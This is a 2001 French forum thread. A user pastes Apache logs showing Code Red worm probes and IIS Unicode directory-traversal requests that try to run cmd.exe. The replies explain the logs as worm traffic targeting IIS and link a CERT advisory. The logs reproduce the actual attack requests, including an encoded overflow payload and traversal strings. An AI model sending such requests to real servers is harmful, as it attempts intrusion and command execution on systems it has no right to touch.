Je crois qu'on essaie de me hacker.

Je crois qu'on essaie de me hacker. - Windows & Software

Marsh Posté le 29-09-2001 à 13:05:35    

Je constate dans les logs de mon serveur Apache quelques trucs louches:
62.11.34.190 - - [23/Sep/2001:23:25:20 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.57.105.144 - - [23/Sep/2001:23:33:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.166.209 - - [24/Sep/2001:00:04:44 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.178.245 - - [24/Sep/2001:00:27:51 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.178.245 - - [24/Sep/2001:02:40:56 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.81.157.44 - - [24/Sep/2001:03:06:55 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
203.65.201.241 - - [24/Sep/2001:05:46:04 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.139.111 - - [24/Sep/2001:20:36:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:49 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:59 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
62.4.139.111 - - [24/Sep/2001:20:37:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
62.4.139.111 - - [24/Sep/2001:20:37:14 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
62.4.139.111 - - [24/Sep/2001:20:37:22 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
 
 
Voilà, à mon avis, le mec essaie de me hacker à coup de buffer overflow, et essaie de lister les fichiers contenus sur mon disque dur. Heureusement, ça ne passe pas. Que puis-je faire? En le traçant, la connection viendrait du fournisseur d'accès www.zeelandnet.nl . A mon avis, il doit se servir de leur proxy. Que puis-je faire contre ça?

Reply

Marsh Posté le 29-09-2001 à 13:05:35   

Reply

Marsh Posté le 29-09-2001 à 13:19:57    

Bien le bonjour
T'inkiet pas, c une attaque du Worm Code Red (ou un de ses nombreux dérivés) qui cherche une faille sur les serveur IIS de Microsoft. C un ver qui se propage de serveur en serveur en attaquant aléatoirement des IP (enfin, plus ou moins, c comme ça qu'il marche). Rien de grave si ton serveur n'est pas IIS (ce qui est le cas  :)
C chiant, mais y'a rien à y faire, g eu le tour aussi sur un serveur...
 
Qu'on me corrige si je me trompe    :sarcastic:

Reply

Marsh Posté le 29-09-2001 à 13:21:04    

Pour complément d'infos
 
http://www.cert.org/advisories/CA-2001-19.html
 
et hop :)

Reply

Marsh Posté le 29-09-2001 à 13:21:04    

ok, ça va alors :D
Ca signifierait donc que ce serveur est infecté par le virus... dommage pour eux ! :D

Reply

Marsh Posté le 29-09-2001 à 13:21:48    

thanks :)
 
niark niark, fuck IIS :gun:

Reply

Marsh Posté le 29-09-2001 à 13:27:28    

Web, kestu fou ici :??:  :D
 
Tu crois que c bien  :ouch: et Auchan alors, comment ils vont tourner si tu passes ta journée sur le net à rien foutre ? :hap:  
 
A+ :p  :hello:


---------------
L'impôt appauvrit l'ignorant et enrichit le connaisseur.
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed